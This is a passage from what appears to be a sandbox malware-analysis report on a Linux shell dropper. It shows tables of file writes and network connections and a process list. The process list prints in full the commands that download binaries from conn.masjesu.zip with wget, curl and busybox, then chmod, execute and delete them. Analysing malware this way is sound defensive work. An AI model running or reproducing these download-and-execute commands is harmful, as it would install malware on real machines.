| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
Processes
/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh
[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
